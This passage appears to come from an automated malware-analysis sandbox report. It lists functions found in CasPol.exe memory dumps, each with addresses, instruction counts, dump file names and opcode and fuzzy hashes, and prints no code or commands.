                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d4be4b5ed4e799832281a11672857dfbdecac8a7f0b018e76b1097b833f7b138
                                                                                                                                    • Instruction ID: b3411595d32aacca20ff92a2f7cbd06d7291adeb6337753d97bad5f2985aa3d3
                                                                                                                                    • Opcode Fuzzy Hash: d4be4b5ed4e799832281a11672857dfbdecac8a7f0b018e76b1097b833f7b138
                                                                                                                                    • Instruction Fuzzy Hash: B7318F35B103168FDB04ABB8C854B9E7BF5AF89214F104979D406EB3A1EF359C42CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC5082F Relevance: .1, Instructions: 100COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6f62995ea559343756dcba9bfa949fd8abaabe45c6979005291a819d3759983e
                                                                                                                                    • Instruction ID: c68f54f0de39e559112566716b20f144615836fa4b6480253b55b3e55bbc6009
                                                                                                                                    • Opcode Fuzzy Hash: 6f62995ea559343756dcba9bfa949fd8abaabe45c6979005291a819d3759983e
                                                                                                                                    • Instruction Fuzzy Hash: 50315074F00325DBEB14DBB5CC98BAE7BF6AFC8241F104829E506E7290EE349801DB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20658620 Relevance: .1, Instructions: 100COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 344c1cd40cd04340028f27b7d13882ccb7cc27ac644a9ce951350ad0ebca5b27
                                                                                                                                    • Instruction ID: 1841b9bdc63b79ccf8d78aab8594d7eeb0c6a70e2b6c8bcdad0a45ccaf558469
                                                                                                                                    • Opcode Fuzzy Hash: 344c1cd40cd04340028f27b7d13882ccb7cc27ac644a9ce951350ad0ebca5b27
                                                                                                                                    • Instruction Fuzzy Hash: 82315770B003065FFB10CAA9C880B9B7BE5EF86700F540465E506FBB85D730ED058B94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC5386D Relevance: .1, Instructions: 97COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cec8b47914133c5b5f8405c690028024272590b3eff5abf5b57c051588202f41
                                                                                                                                    • Instruction ID: caea5e072a39fcb3c9bbe1a1b3491c31e998151bb88be1f5419eb0339375db76
                                                                                                                                    • Opcode Fuzzy Hash: cec8b47914133c5b5f8405c690028024272590b3eff5abf5b57c051588202f41
                                                                                                                                    • Instruction Fuzzy Hash: 42417874A152299FDB62DF69C848AA8BBF6FF48310F1091DA985CA3320DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC538C4 Relevance: .1, Instructions: 87COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4d05cfa477dc38f43920d7667db41ff199b4cf59456d276ace3918bfb6783f2f
                                                                                                                                    • Instruction ID: 9a47844ba5f5a9b8f5de530456e3d434490f2036ace4d2a87c0fd1cdcedeaa27
                                                                                                                                    • Opcode Fuzzy Hash: 4d05cfa477dc38f43920d7667db41ff199b4cf59456d276ace3918bfb6783f2f
                                                                                                                                    • Instruction Fuzzy Hash: 91416474A152299FDB61DF68C849AA8BBF6FF49310F1091DA985DA3320DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC56053 Relevance: .1, Instructions: 87COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e4467accbcdf02d7ea64985844529d081c00181d0c0caf5b402f969c092a22df
                                                                                                                                    • Instruction ID: ed3d2f20559e01ea686bbc414354b44d0f193d019bec5c8343acbf07b7144a78
                                                                                                                                    • Opcode Fuzzy Hash: e4467accbcdf02d7ea64985844529d081c00181d0c0caf5b402f969c092a22df
                                                                                                                                    • Instruction Fuzzy Hash: 35310435B043198FCB01DB7CCC545AEBBF2AB89310B10816AE809D7392EF309D02DB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC591A9 Relevance: .1, Instructions: 85COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dd5abf1f8d03199385c72c440ab6e6ea666fbf77bfe169afe7d35203114eadcb
                                                                                                                                    • Instruction ID: 998cd7909199a691c12a4ab9765b2022d9f43e7c7695e96fa5cd790d5eb76bb7
                                                                                                                                    • Opcode Fuzzy Hash: dd5abf1f8d03199385c72c440ab6e6ea666fbf77bfe169afe7d35203114eadcb
                                                                                                                                    • Instruction Fuzzy Hash: 61214836F483928FDF419BB858546CD7FF19F86240B0105BAD40ACF651DF389909C765
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC51A7B Relevance: .1, Instructions: 85COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 40fb52f6144388da3e78efbf459987e6f4b1e9da4ef67fa5754ce9ce6566acea
                                                                                                                                    • Instruction ID: 0e9892ad01c63c671ae4ca471388ba2deb629b7377a1ddb772126179d54a26ca
                                                                                                                                    • Opcode Fuzzy Hash: 40fb52f6144388da3e78efbf459987e6f4b1e9da4ef67fa5754ce9ce6566acea
                                                                                                                                    • Instruction Fuzzy Hash: FC313C75B00719DFDB11CFA9C884A8EBBB2BF88300F25492AD905EB221D771A942DB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC51963 Relevance: .1, Instructions: 81COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fb2f5d1be40d060d1f2b77082ccab1322f0d3123a328b66da3fe424d9e60ed6c
                                                                                                                                    • Instruction ID: 3aab74b22c928ec96099b594d9708a26fb4d52a49275562396e0d89a33f951f1
                                                                                                                                    • Opcode Fuzzy Hash: fb2f5d1be40d060d1f2b77082ccab1322f0d3123a328b66da3fe424d9e60ed6c
                                                                                                                                    • Instruction Fuzzy Hash: 7D213B367003A18FD7224AA9C48835977E1EBCA324F148927D047CB2B1D738D888D756
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC5391B Relevance: .1, Instructions: 77COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2ab2083c24f7dc9a0ddd9f9f41739d78d945f1acc781e2a58ac96eef575d0983
                                                                                                                                    • Instruction ID: 0edd9cd51dc118ae9fa6c7c5df6f874d6f43a49b8c6e6b29a818702ef97d92fe
                                                                                                                                    • Opcode Fuzzy Hash: 2ab2083c24f7dc9a0ddd9f9f41739d78d945f1acc781e2a58ac96eef575d0983
                                                                                                                                    • Instruction Fuzzy Hash: 40316774A152299FDBA1DF68C848AA9BBF6FF49310F1091DA985DA3320DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20653DE5 Relevance: .1, Instructions: 77COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5dc03594a9a96b1710ca58d025d4d20d59973516c085dd0dfb7bdeb41fbb713a
                                                                                                                                    • Instruction ID: 37a391d50525e7747e06320792ace790f40bc50bc4ce2373faac22967578f4f6
                                                                                                                                    • Opcode Fuzzy Hash: 5dc03594a9a96b1710ca58d025d4d20d59973516c085dd0dfb7bdeb41fbb713a
                                                                                                                                    • Instruction Fuzzy Hash: 58210436B042059FE7018BB8DC41BDABBF2EB85225F1981A7D118EB291C630DD198B21
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20655F04 Relevance: .1, Instructions: 74COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ccb67e4d4d1dda981676907a9b5896347510764d8c87a98a8ac486a4541d2a4e
                                                                                                                                    • Instruction ID: 1b72e4323fbe4c13878789088e22cd8db897dd4c77f6dbabb299727b911f13a1
                                                                                                                                    • Opcode Fuzzy Hash: ccb67e4d4d1dda981676907a9b5896347510764d8c87a98a8ac486a4541d2a4e
                                                                                                                                    • Instruction Fuzzy Hash: 7321F675F043948FCB81DBB9885466E7FF59F8921072140AAD108E7311EF356D0ADBA6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC5A0E8 Relevance: .1, Instructions: 73COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e199f7433362b69509d97821f5f636614ae6d2be16c5ee9e217dcd5e92b111c7
                                                                                                                                    • Instruction ID: ecb2e0c57412f6db56af991e0b88ac4d612bbc312990970925f2cd8c0601d764
                                                                                                                                    • Opcode Fuzzy Hash: e199f7433362b69509d97821f5f636614ae6d2be16c5ee9e217dcd5e92b111c7
                                                                                                                                    • Instruction Fuzzy Hash: 9F218131F00305CFDF058A7EC85479F7EE6AB89310F244229E502EB2B0EE71984497A9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC59E60 Relevance: .1, Instructions: 73COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8393f31958f66a8ac4167335daddd616acad67bd068297dac29f06897e0253ea
                                                                                                                                    • Instruction ID: eae56810dee0af77fad879297813568fa5416eb00db9fa8857e7055a61959df2
                                                                                                                                    • Opcode Fuzzy Hash: 8393f31958f66a8ac4167335daddd616acad67bd068297dac29f06897e0253ea
                                                                                                                                    • Instruction Fuzzy Hash: 0221F675B083918FD7029BB499502D97BB1DB8A300F1945EAD04ACB352EA349C058366
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065FA84 Relevance: .1, Instructions: 69COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 71bf39405eaf5c5321c73969843909af6b7f9299a35041f1c5fd532f5026810e
                                                                                                                                    • Instruction ID: 5033c48edd28e783ae19c80c05dbcf51477836384a5cf17dbb224a9b841c3e77
                                                                                                                                    • Opcode Fuzzy Hash: 71bf39405eaf5c5321c73969843909af6b7f9299a35041f1c5fd532f5026810e
                                                                                                                                    • Instruction Fuzzy Hash: B7219375B053548FCB42DBBCC851A9E7FF1EF8964071540AAD108E7221EE305D06DBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC50758 Relevance: .1, Instructions: 67COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ce9df160d408c6edac09cfaa779d03cb29176caececcf4bf2f3b3cf304a7913b
                                                                                                                                    • Instruction ID: 71e72ccea4c7b26b91a035451a873b8d619fcf492f7dec2cb774aedadb4c6f17
                                                                                                                                    • Opcode Fuzzy Hash: ce9df160d408c6edac09cfaa779d03cb29176caececcf4bf2f3b3cf304a7913b
                                                                                                                                    • Instruction Fuzzy Hash: 8C117275F40212DFCB54ABB8C88569EBBF6AF8C251F100529E50AE7390EF358C05C7A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53972 Relevance: .1, Instructions: 67COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 737961c7b9ce0651a7f39d2c57357426ccf250bfe5ac1f562e7763bd997f4971
                                                                                                                                    • Instruction ID: 44457e27712f47d871fe50b1199b69eb6239ac10a994e8a6d6ff5430af537c05
                                                                                                                                    • Opcode Fuzzy Hash: 737961c7b9ce0651a7f39d2c57357426ccf250bfe5ac1f562e7763bd997f4971
                                                                                                                                    • Instruction Fuzzy Hash: 16317474A152299FDB61DF68C848AA9BBF6FF49310F1091DA9858A3320DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC574D9 Relevance: .1, Instructions: 66COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b6fce9efce68188b807978b892bbba227bca819348db55ebef8d7719fa83da76
                                                                                                                                    • Instruction ID: f35d8f8288515599472ffa3ba360fe0600b2a903ce2cf43ff4ee6fdf5440ddc4
                                                                                                                                    • Opcode Fuzzy Hash: b6fce9efce68188b807978b892bbba227bca819348db55ebef8d7719fa83da76
                                                                                                                                    • Instruction Fuzzy Hash: 1A112675B083D5CFD7029779AC007A93FB5DF86310F0500BAD144DB252EB3198019B66
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20654160 Relevance: .1, Instructions: 65COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bb816245c740b814f4bc70433082c7a0cb41dde183ba09e38e165f9784207016
                                                                                                                                    • Instruction ID: 861257ee7d5046891590acc9d179a813d54afa747b02a9b9f4dfba0a65cfa68d
                                                                                                                                    • Opcode Fuzzy Hash: bb816245c740b814f4bc70433082c7a0cb41dde183ba09e38e165f9784207016
                                                                                                                                    • Instruction Fuzzy Hash: F11108353087949FDB1A9BF888606BE3FB36FC9110719406AE506DB3D1DE384E02D7A6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20658064 Relevance: .1, Instructions: 64COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ccb04325e1a04028aa7d769fe239e269620e9c8b47d8ad79d982acd8c9cb5536
                                                                                                                                    • Instruction ID: c1a47c18f205eab19e45c382a7731040059fedeb97109bae114b8cc50c159395
                                                                                                                                    • Opcode Fuzzy Hash: ccb04325e1a04028aa7d769fe239e269620e9c8b47d8ad79d982acd8c9cb5536
                                                                                                                                    • Instruction Fuzzy Hash: 3E11D375B043598FCB41DBBC885166EBFF1AF8D20072040AAD108E7321EF30AD06DBA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20657F44 Relevance: .1, Instructions: 64COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0a0b77805b27f65dbfabc02920550d9c20673fd25d1a459afcca7d1aac6ca8ed
                                                                                                                                    • Instruction ID: 96610fcb6acbd14f0517182695d1643b8cf8032ba9bfb4c7527e9e4f129c09d9
                                                                                                                                    • Opcode Fuzzy Hash: 0a0b77805b27f65dbfabc02920550d9c20673fd25d1a459afcca7d1aac6ca8ed
                                                                                                                                    • Instruction Fuzzy Hash: F3118175F043588FCB41DBBC884169EBFF6AF8921071180AAD508E7361EE30AD06DB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC50768 Relevance: .1, Instructions: 61COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 80113ebb4d1293909a0e243507a68cd2e1db85ae91084d32c4bd286a7c46268b
                                                                                                                                    • Instruction ID: d82c5aac8b68fd6ee3835c9e94f7c92690e9ea0281b73a54f9c0b64c10fafe29
                                                                                                                                    • Opcode Fuzzy Hash: 80113ebb4d1293909a0e243507a68cd2e1db85ae91084d32c4bd286a7c46268b
                                                                                                                                    • Instruction Fuzzy Hash: DF119135F402158FCB54ABB8884879EBBF6AFCC250F104829E90AE7390EF359C45C7A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065FA40 Relevance: .1, Instructions: 57COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d05653d173fc500461352cb831150da10f20560f358de2365698607a59e8c0e4
                                                                                                                                    • Instruction ID: b9e414e966274e5c4159f0b058f83df6f53b9027a087a5cecb2e945431069ce0
                                                                                                                                    • Opcode Fuzzy Hash: d05653d173fc500461352cb831150da10f20560f358de2365698607a59e8c0e4
                                                                                                                                    • Instruction Fuzzy Hash: 9A11A539B047058FCB41DBB8D8829DA7BF1EF8971071181AED449DB265EE309D0ADB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC50098 Relevance: .1, Instructions: 56COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 198865ba07335f2793971a8b2eb0282cbd80754560399920ab5c9dc2b9eb4fbd
                                                                                                                                    • Instruction ID: 4fc636adbb6aff8b8ae265ce908e600d15176033d3bcce7cc872c7650689ce59
                                                                                                                                    • Opcode Fuzzy Hash: 198865ba07335f2793971a8b2eb0282cbd80754560399920ab5c9dc2b9eb4fbd
                                                                                                                                    • Instruction Fuzzy Hash: E911C231E01216CFCF24EFB8994019EBBF1EB49321B10827AC918EB261E7359943CBD5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC539C9 Relevance: .1, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cc6ffbc0ad248c3146c50dda7932052c3cc381ed1b8c6602abe7625f39826556
                                                                                                                                    • Instruction ID: 66ad05e9f40ead29510f037b0b1e723cc75034a15950d3ef457582c2fb14ec5c
                                                                                                                                    • Opcode Fuzzy Hash: cc6ffbc0ad248c3146c50dda7932052c3cc381ed1b8c6602abe7625f39826556
                                                                                                                                    • Instruction Fuzzy Hash: 06219774A10229DFDB62DF68C8446A9BBFAFF49310F1091DA9858A3320DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC560A8 Relevance: .1, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 10cd44e50425c8f0e0efbd00e5b67ec0a8f8531ecce998066e170ddc4cb2c974
                                                                                                                                    • Instruction ID: a4bbd5d593d59186225b050d0ad598a0daecc2227fe1670c173a20638a5fc4b3
                                                                                                                                    • Opcode Fuzzy Hash: 10cd44e50425c8f0e0efbd00e5b67ec0a8f8531ecce998066e170ddc4cb2c974
                                                                                                                                    • Instruction Fuzzy Hash: 7F114C75F002188FCB50DBBDC8945AEBBF6BB8C2507108029E909E3354EA349E01DB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065FAA0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2765b41e85c2d2682a9524475cda41ef58753200ae13ac76b0cc5273fa4dc298
